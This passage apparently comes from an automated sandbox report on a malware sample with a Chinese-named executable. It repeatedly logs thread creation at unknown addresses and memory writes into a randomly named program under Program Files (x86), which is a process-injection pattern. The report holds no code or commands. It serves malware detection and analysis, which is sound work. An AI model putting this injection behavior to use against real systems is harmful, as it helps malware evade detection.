        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2570000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2580000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 12D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1320000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 28A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 28B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1170000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2700000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2750000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 10B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 10C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1350000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 13A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 7B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 7C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1270000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 20D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 23D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2720000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2770000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 570000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 580000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2840000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2990000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 26B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2700000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2DF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2BD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1480000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 3230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2E00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2E50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2540000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2690000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2BF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2910000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: ED0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2110000Jump to behavior
